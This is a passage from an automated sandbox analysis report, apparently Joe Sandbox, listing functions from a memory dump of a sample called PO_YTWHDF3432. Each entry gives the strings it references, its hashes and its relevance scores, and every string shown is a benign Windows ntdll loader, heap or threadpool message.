                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                          • API String ID: 0-1245972979
                                                                          • Opcode ID: a4a90e002dc79ad87f91968893ee0f3fadb653f93ebaeb4e57c99731e5d5569d
                                                                          • Instruction ID: 6c8445d6d4cc121e980a46cc3277b2909184609b3cac6ec1c9107a9198aaec31
                                                                          • Opcode Fuzzy Hash: a4a90e002dc79ad87f91968893ee0f3fadb653f93ebaeb4e57c99731e5d5569d
                                                                          • Instruction Fuzzy Hash: 056144326407169BD722CF1DC881F2ABBE9BF84B51F14852DED5DAB240C730EA41CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0194106B
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01941028
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01940FE5
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019410AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          • API String ID: 0-1468400865
                                                                          • Opcode ID: 0389365b99665b3bc1a72e4040ec5afdc16c0f3597ca9336cd6943442ba4e338
                                                                          • Instruction ID: 2dbf218320723d8f5e5d9251b305998fc0e0e644c92731b685d86f1cac6e735d
                                                                          • Opcode Fuzzy Hash: 0389365b99665b3bc1a72e4040ec5afdc16c0f3597ca9336cd6943442ba4e338
                                                                          • Instruction Fuzzy Hash: BD71C171A043159FCB21DF18C885F9B7FE8AFA5764F140468F9488B24AE734D688CBD2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0190245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpDynamicShimModule, xrefs: 0194A998
                                                                          • apphelp.dll, xrefs: 01902462
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0194A9A2
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0194A992
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-176724104
                                                                          • Opcode ID: 5a9b7e213b817d3adf6961bd894fbcbaef360a2b245f00a19c8fbc3296cef9ea
                                                                          • Instruction ID: f0b97299564995ae02b9b0bd3ba10e92dd976fbb63114722103b242f1050f217
                                                                          • Opcode Fuzzy Hash: 5a9b7e213b817d3adf6961bd894fbcbaef360a2b245f00a19c8fbc3296cef9ea
                                                                          • Instruction Fuzzy Hash: FE316B76680202EBDB31DF6DC885E6AB7B9FB84B05F16001DF90AA7245D7709AC1C781
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          • Opcode ID: 58e6c0ab34ad72db4d7804b9f9e5ca932e200b206dcec0c6530d4434ca9ff339
                                                                          • Instruction ID: 9a3ccd7791e8c03e5d6e6226c0c7aa2bf5d95c5a0a9a229baf59db27c0c5670d
                                                                          • Opcode Fuzzy Hash: 58e6c0ab34ad72db4d7804b9f9e5ca932e200b206dcec0c6530d4434ca9ff339
                                                                          • Instruction Fuzzy Hash: 35F18B70700606DFEB15CFA8C884F6AB7B6FB44704F158169E61ADB392D734EA81CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01906962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          • API String ID: 0-1077428164
                                                                          • Opcode ID: 2d34ee851431d31172d5b6bba9e1a207cbfc90b81faa71f19838c71e78320b39
                                                                          • Instruction ID: f2df600b18fcbb1f32a1a85befa95a4078e90d814735a397d2e5e0fc0cd9dbaa
                                                                          • Opcode Fuzzy Hash: 2d34ee851431d31172d5b6bba9e1a207cbfc90b81faa71f19838c71e78320b39
                                                                          • Instruction Fuzzy Hash: C5C270716093419FE72ACF68C841BABBBE5AF88754F04892DE9CDC7281D734E845CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          • API String ID: 0-2779062949
                                                                          • Opcode ID: 1b201232d4c46f55b5e439a2ee6ab36f0e2423737c8bb0aeefbb7add709f4673
                                                                          • Instruction ID: 0e50f9a5c412a98d2c0e177e9f7b6852dde585f9154a89accb503249b0439d4e
                                                                          • Opcode Fuzzy Hash: 1b201232d4c46f55b5e439a2ee6ab36f0e2423737c8bb0aeefbb7add709f4673
                                                                          • Instruction Fuzzy Hash: C2A128759116299BDB21DF68CC88BAAB7B8EF84710F1041EAEA0DE7250D7359F84CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01900BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpCheckModule, xrefs: 0194A117
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0194A10F
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0194A121
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-161242083
                                                                          • Opcode ID: 6f922562a74c1843ebb4c0e4a0b71cb06cdc4d61c40a6324f0b90647b718c428
                                                                          • Instruction ID: 07ceeec5a689b25d53a4827ddfd07f69435d912c5f5f1e246a3a9ca10b24d0c2
                                                                          • Opcode Fuzzy Hash: 6f922562a74c1843ebb4c0e4a0b71cb06cdc4d61c40a6324f0b90647b718c428
                                                                          • Instruction Fuzzy Hash: 8771AE70E402059FDB26DF6CC981BAEB7F8FB88744F18442DE50AE7255E634AA81CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-1334570610
                                                                          • Opcode ID: b878e725bdf0cd9be6549b929338c9cf62469b9fac8a10ac033b553e8fa504b6
                                                                          • Instruction ID: 4089bdc55204367235ed1f891af6bdc5a7fc41ee2322170ac1640ba410d0dfa4
                                                                          • Opcode Fuzzy Hash: b878e725bdf0cd9be6549b929338c9cf62469b9fac8a10ac033b553e8fa504b6
                                                                          • Instruction Fuzzy Hash: 0761CE70600306DFEB29CF28C480B6ABBE2FF45708F15855DE589CB296D770E981CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0191C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 019582DE
                                                                          • Failed to reallocate the system dirs string !, xrefs: 019582D7
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 019582E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1783798831
                                                                          • Opcode ID: b118c54c315192aff42893704d9e8c224ed1080157edc9a233b56019ac78223c
                                                                          • Instruction ID: 781906dda9576858e619b78d4bd1144f7285604ab1a79aec17a98f6e1757db81
                                                                          • Opcode Fuzzy Hash: b118c54c315192aff42893704d9e8c224ed1080157edc9a233b56019ac78223c
                                                                          • Instruction Fuzzy Hash: 03411571549305ABD721EB68D984B5B7BE8FF88750F00482EFA4CD3294E7B4D980CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0199C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0199C1C5
                                                                          • @, xrefs: 0199C1F1
                                                                          • PreferredUILanguages, xrefs: 0199C212
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          • Opcode ID: a5cfd3dae35bbd9e388dc38c1c7d92f10ef8e5a259a09c75fcf165b72a606f84
                                                                          • Instruction ID: 07a7443c16114b54d9e2701369b3cf8213724d43f973c82d49d75ac7af79fd0a
                                                                          • Opcode Fuzzy Hash: a5cfd3dae35bbd9e388dc38c1c7d92f10ef8e5a259a09c75fcf165b72a606f84
                                                                          • Instruction Fuzzy Hash: 06413171E00219ABDF11DBDCCC91FEEBBBCAB55705F1441AAE609E7280D774DA448B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01974144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          • API String ID: 0-1373925480
                                                                          • Opcode ID: 01251fa5bfa7670f5c742b379038dec05f93911d76d9702e54c7c4e64cd2da2d
                                                                          • Instruction ID: 8d179e0837405e63c8ec7415ddc40366b7b1d2294d1250c563f1f5717b2c6be7
                                                                          • Opcode Fuzzy Hash: 01251fa5bfa7670f5c742b379038dec05f93911d76d9702e54c7c4e64cd2da2d
                                                                          • Instruction Fuzzy Hash: AD411771A046598FEB25EBD9D840BADBBB8FFA5340F140459DA09FB792D7348901CB21
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01964755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01964888
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01964899
                                                                          • LdrpCheckRedirection, xrefs: 0196488F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-3154609507
                                                                          • Opcode ID: 5c40ed323fd149f231e9773bc5e639365f6e52257fb54cee649541358571387b
                                                                          • Instruction ID: 65ef74ab8714373d210a985b7f391b2e6ea355180409157882ebfa643ac69c37
                                                                          • Opcode Fuzzy Hash: 5c40ed323fd149f231e9773bc5e639365f6e52257fb54cee649541358571387b
                                                                          • Instruction Fuzzy Hash: 7341AF32A057519FCB21CEA8D940A66BBECAF8AA51B060569ED4DD7351D734E800CBE2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-2558761708
                                                                          • Opcode ID: 987141f99ab847f31ee926fca97e000c46b88da77754e930e75ba832b61aed30
                                                                          • Instruction ID: dbdd784aefb8fb4386266cfe0a934d5bd81319201667510d5ef90294dc36ee8e
                                                                          • Opcode Fuzzy Hash: 987141f99ab847f31ee926fca97e000c46b88da77754e930e75ba832b61aed30
                                                                          • Instruction Fuzzy Hash: 9511CD3131614A9FEB29DA18C480F7AB3A6AF41B1AF1A811DF50ACF352DB34D941C751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 019620F3
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01962104
                                                                          • LdrpInitializationFailure, xrefs: 019620FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          • Opcode ID: 3ad063a5a894ec0c8c47f1398a432b9dae31513cd9d2f8f44b2d9a5f0e07621a
                                                                          • Instruction ID: 85d5cec5ffc040e1656c590256ed24149a9977472df1cab8bb34f022f0e25171
                                                                          • Opcode Fuzzy Hash: 3ad063a5a894ec0c8c47f1398a432b9dae31513cd9d2f8f44b2d9a5f0e07621a
                                                                          • Instruction Fuzzy Hash: DDF0C875645308ABE724D75CCC86F96376DFB40B55F510059FA08B7785D2B0AA40CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          • API String ID: 48624451-232158463
                                                                          • Opcode ID: 6d76755c8cde36eabc5ef483aae5806805ab147b329c30a87b6cfeb699c2bcf6
                                                                          • Instruction ID: d14f8dec57a7b6c4d623dd4e797de9a53c1ca30230fb1742d1fbd3dc261e3d16
                                                                          • Opcode Fuzzy Hash: 6d76755c8cde36eabc5ef483aae5806805ab147b329c30a87b6cfeb699c2bcf6
                                                                          • Instruction Fuzzy Hash: 2C713D71A0014A9FDB01DF98C990FAEB7F8BF58704F154069EA05E7251EA38EE41CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrResSearchResource Enter, xrefs: 018EAA13
                                                                          • LdrResSearchResource Exit, xrefs: 018EAA25
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          • API String ID: 0-4066393604
                                                                          • Opcode ID: e475fea406e285ea6c0447377913e73ec8115a106e0505a7e2aa1c69ba6e3f80
                                                                          • Instruction ID: 3cd8dbe902a8aa67c6a587a7f0f4a3c20d97614dabc40f399959e4d399a2119d
                                                                          • Opcode Fuzzy Hash: e475fea406e285ea6c0447377913e73ec8115a106e0505a7e2aa1c69ba6e3f80
                                                                          • Instruction Fuzzy Hash: 99E1A171E00219AFEF26CFA8D984FAEBBB9BF59714F104526F905E7241D7349A40CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction ID: 490e2741810ccd3113f9c23beb0972e595d400ad5a850dd8c3f3892eb272f559
                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction Fuzzy Hash: C6C1E3312043429BE725CF28C844B6BBBE5BFC4719F484A2CF69ACB290D774D509CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0195E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          • Opcode ID: cc18aaacd76810a16e0d1e204be0db3137bd2caedb05a8b3235d96a8a2df35ba
                                                                          • Instruction ID: bf452e3c51585106b9cd7fdf66d61ff94c95af357e14db12ce5e926a60d57938
                                                                          • Opcode Fuzzy Hash: cc18aaacd76810a16e0d1e204be0db3137bd2caedb05a8b3235d96a8a2df35ba
                                                                          • Instruction Fuzzy Hash: C2616C71E006199FDB65DFA8C980BADFBB9FB48700F14446DEA49EB251D732EA00CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          • Opcode ID: 37dc09822790a10e42a915f44d81ba72f991d89d4c73448a085e8ff487add946
                                                                          • Instruction ID: 5a41e3e436cc5d071767730f929f5840ae2c6714102d3d14bf0444fde085db01
                                                                          • Opcode Fuzzy Hash: 37dc09822790a10e42a915f44d81ba72f991d89d4c73448a085e8ff487add946
                                                                          • Instruction Fuzzy Hash: 9751E871D0021EAEDF11DFA9CC90FEEBBBDEF54754F100529E615AB290D6309A45CB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018E063D
                                                                          • kLsE, xrefs: 018E0540
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 0-2547482624
                                                                          • Opcode ID: 90fab7bb442391bb11932a9b09086a133510f935e23e10e188c0dc398abc9752
                                                                          • Instruction ID: 94bbdbeb75e10c2b23ce04e48ecdce6b56b534783a17efee10c5673af03ad29d
                                                                          • Opcode Fuzzy Hash: 90fab7bb442391bb11932a9b09086a133510f935e23e10e188c0dc398abc9752
                                                                          • Instruction Fuzzy Hash: 3151AB716047469BD724EF68C4887A3BBE4AF86304F104C3EF6AAC7251E7B09645CF92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 018EA2FB
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 018EA309
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          • API String ID: 0-2876891731
                                                                          • Opcode ID: 88f7a2b67a4783bf9de27b3d56a549b1fbb38c02080bb6c8ea4dbad537044e54
                                                                          • Instruction ID: 5c1efafcbd5169ff5e2ff9e27b0e1c792eb37dfef3992129aa1c811015a0fc09
                                                                          • Opcode Fuzzy Hash: 88f7a2b67a4783bf9de27b3d56a549b1fbb38c02080bb6c8ea4dbad537044e54
                                                                          • Instruction Fuzzy Hash: 0241AD30A04649DBDB19CF59D844B6ABBF8FF86B04F1440A9E918DB291E2B5DA40CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0191A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          • API String ID: 2994545307-4008356553
                                                                          • Opcode ID: 2d7a1f2e25bc8e1a54d9b22201968a7f96f7b3be444ddcaff187849937ddf21b
                                                                          • Instruction ID: d2f71c98a19822b2faaaddde44e2b1a27159d98f40cd4d0fef533141bf40c4c7
                                                                          • Opcode Fuzzy Hash: 2d7a1f2e25bc8e1a54d9b22201968a7f96f7b3be444ddcaff187849937ddf21b
                                                                          • Instruction Fuzzy Hash: CD01ADB2245748AFD312DF14CD85B1677E8E794725F048939A64CC72A4E334E944CB46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          • Opcode ID: c6454da2f24836926dc14102a1782b2a06a2fbe8f15788ec6f81425cfee3e2f9
                                                                          • Instruction ID: 5a4b9ef17220057a9640cced832200f30af818cd474328569183b20c714fb2e6
                                                                          • Opcode Fuzzy Hash: c6454da2f24836926dc14102a1782b2a06a2fbe8f15788ec6f81425cfee3e2f9
                                                                          • Instruction Fuzzy Hash: E6827B75E002198FEB24CFA9C988BEDBBF1BF4A314F148169E919EB351D7309A45CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0198A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 58f2fa3f03ab51082fdfa2419e82acba962c79d6333b41d8f1da9b1946006e85
                                                                          • Instruction ID: d3b21eb9205c44c40fab6af38308aeacca9c4be8bb089f4f3684fb9bd2baf651
                                                                          • Opcode Fuzzy Hash: 58f2fa3f03ab51082fdfa2419e82acba962c79d6333b41d8f1da9b1946006e85
                                                                          • Instruction Fuzzy Hash: 5422C1706046618BEB25EF2DC090776BBF5BF44305F08885BD98E8F286E375E492DB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01966420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
